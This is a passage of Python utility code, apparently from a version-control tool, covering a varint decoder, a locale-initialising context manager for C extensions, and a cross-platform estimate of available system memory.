    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7

# Passing the '' locale means that the locale should be set according to the
# user settings (environment variables).
# Python sometimes avoids setting the global locale settings. When interfacing
# with C code (e.g. the curses module or the Subversion bindings), the global
# locale settings must be initialized correctly. Python 2 does not initialize
# the global locale settings on interpreter startup. Python 3 sometimes
# initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
# explicitly initialize it to get consistent behavior if it's not already
# initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
# LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
# if we can remove this code.
@contextlib.contextmanager
def with_lc_ctype():
    oldloc = locale.setlocale(locale.LC_CTYPE, None)
    if oldloc == 'C':
        try:
            try:
                locale.setlocale(locale.LC_CTYPE, '')
            except locale.Error:
                # The likely case is that the locale from the environment
                # variables is unknown.
                pass
            yield
        finally:
            locale.setlocale(locale.LC_CTYPE, oldloc)
    else:
        yield

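# Usage sketch (illustrative): wrap calls into locale-sensitive C code, e.g.
#
#     with with_lc_ctype():
#         curses.wrapper(main)  # 'main' here is a hypothetical entry point
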
def _estimatememory():
    # type: () -> Optional[int]
    """Provide an estimate for the available system memory in Bytes.

    If no estimate can be provided on the platform, returns None.
    """
    if pycompat.sysplatform.startswith(b'win'):
        # On Windows, use the GlobalMemoryStatusEx kernel function directly.
        # Structure, byref, sizeof and windll live in ctypes itself, not in
        # ctypes.wintypes.
        from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
        from ctypes import (  # pytype: disable=import-error
            Structure,
            byref,
            sizeof,
            windll,
        )

        class MEMORYSTATUSEX(Structure):
            _fields_ = [
                ('dwLength', DWORD),
                ('dwMemoryLoad', DWORD),
                ('ullTotalPhys', DWORDLONG),
                ('ullAvailPhys', DWORDLONG),
                ('ullTotalPageFile', DWORDLONG),
                ('ullAvailPageFile', DWORDLONG),
                ('ullTotalVirtual', DWORDLONG),
                ('ullAvailVirtual', DWORDLONG),
                ('ullExtendedVirtual', DWORDLONG),
            ]

        x = MEMORYSTATUSEX()
        x.dwLength = sizeof(x)
        windll.kernel32.GlobalMemoryStatusEx(byref(x))
        return x.ullAvailPhys

    # On newer Unix-like systems and Mac OS X, the sysconf interface
    # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
    # seems to be implemented on most systems.
    try:
        pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
        pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
        return pagesize * pages
    except OSError:  # sysconf can fail
        pass
    except KeyError:  # unknown parameter
        pass
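

# Usage sketch (illustrative): treat None as "no estimate" and only act on a
# concrete number, e.g.
#
#     mem = _estimatememory()
#     if mem is not None and mem < 2 ** 31:
#         pass  # prefer a less memory-hungry strategy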